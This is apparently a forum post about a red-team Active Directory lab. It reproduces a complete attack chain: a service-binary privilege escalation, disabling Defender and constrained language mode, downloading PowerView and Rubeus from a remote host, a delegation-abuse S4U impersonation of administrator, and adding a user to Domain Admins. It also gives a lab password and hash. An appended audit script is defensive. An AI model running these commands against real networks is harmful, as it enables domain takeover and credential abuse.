Red-teaming Active Directory Lab #2 (ELS.BANK): scenario 3 protected users

Spoiler alert…

The solution states:

With everything set now, we can utilize Rubeus to get a ticket for “exch_adm” and assign the DCSync rights as we did in Scenario 1 (remember that Domain admins are members of “Protected users” so we can’t simply utilize this attack to get access to those accounts).

But executing the following commands will get a ticket for administrator and will still add a user to Domain Admins:

# provide privesc.exe
sc.exe config "Service KMSELDI"  binPath=C:\Users\analyst1\Downloads\privesc.exe
sc.exe stop "Service KMSELDI" 
sc.exe start "Service KMSELDI"
# disable clm and defender as admin
Set-MpPreference -DisableRealtimeMonitoring $true
setx __PSLockdownPolicy 0 /m
# do slavi work
# Welcome123
runas /user:els\slavi "powershell -ep bypass"
cd $env:Userprofile
(New-Object Net.Webclient).DownloadFile("http://175.12.80.10:8080/PowerView.ps1", "$env:Userprofile\powerview.ps1")
(New-Object Net.Webclient).DownloadFile("http://175.12.80.10:8080/Rubeus.exe", "$env:Userprofile\Rubeus.exe")
Import-Module .\powerview.ps1
Set-DomainObjectOwner -Identity S-1-5-21-3192643952-2658629199-322554960-1000 -OwnerIdentity slavi -Verbose
Add-DomainObjectACL -TargetIdentity S-1-5-21-3192643952-2658629199-322554960-1000 -Rights All -PrincipalIdentity slavi
$IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList "els\svc-omada").Translate([System.Security.Principal.SecurityIdentifier])).Value
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Set-DomainObject -Identity S-1-5-21-3192643952-2658629199-322554960-1000 -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
.\Rubeus.exe s4u /user:svc-omada /rc4:65F91B600E51F19A80593D0A62047CC5 /impersonateuser:administrator /msdsspn:"host/bank-dc.els.bank" /altservice:ldap,rpc,http,cifs /ptt
net group "Domain Admins" /domain /add analyst1
The request will be processed at a domain controller for domain els.bank.

The command completed successfully.

That seems to be in direct contradiction to the solution.

Is that a lab misconfiguration?
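
One way to check the lab's state from the defender's side, as an added example that is not part of the original post or the lab solution: the script below lists each Domain Admins member with its Protected Users membership and "account is sensitive and cannot be delegated" flag, then lists computers that have resource-based constrained delegation configured. It assumes the RSAT ActiveDirectory module and read access to the domain; the two function names are hypothetical.

```powershell
# Added example: audit script, not code from the post or the lab.
# Assumes the RSAT ActiveDirectory module and domain read access.
Import-Module ActiveDirectory

function Get-PrivilegedDelegationExposure {
    # SIDs of every direct or nested member of Protected Users
    $protected = @(Get-ADGroupMember -Identity 'Protected Users' -Recursive |
        ForEach-Object { $_.SID.Value })

    Get-ADGroupMember -Identity 'Domain Admins' -Recursive |
        Where-Object { $_.objectClass -eq 'user' } |
        ForEach-Object {
            $u = Get-ADUser -Identity $_.SID.Value -Properties AccountNotDelegated
            [pscustomobject]@{
                SamAccountName      = $u.SamAccountName
                # RID 500 is the built-in Administrator account
                IsBuiltinAdmin      = $u.SID.Value -match '-500$'
                InProtectedUsers    = $protected -contains $u.SID.Value
                # "Account is sensitive and cannot be delegated"
                AccountNotDelegated = $u.AccountNotDelegated
            }
        }
}

function Get-RbcdConfiguredComputer {
    # Computers whose msDS-AllowedToActOnBehalfOfOtherIdentity is populated
    $filter = '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)'
    Get-ADComputer -LDAPFilter $filter -Properties PrincipalsAllowedToDelegateToAccount |
        Select-Object Name, @{
            Name       = 'AllowedPrincipals'
            Expression = { $_.PrincipalsAllowedToDelegateToAccount -join '; ' }
        }
}

Get-PrivilegedDelegationExposure | Format-Table -AutoSize
Get-RbcdConfiguredComputer | Format-Table -AutoSize
```

A Domain Admins row with both `InProtectedUsers` and `AccountNotDelegated` false shows an account that neither control covers, and any unexpected entry in the second table is a delegation grant worth reviewing.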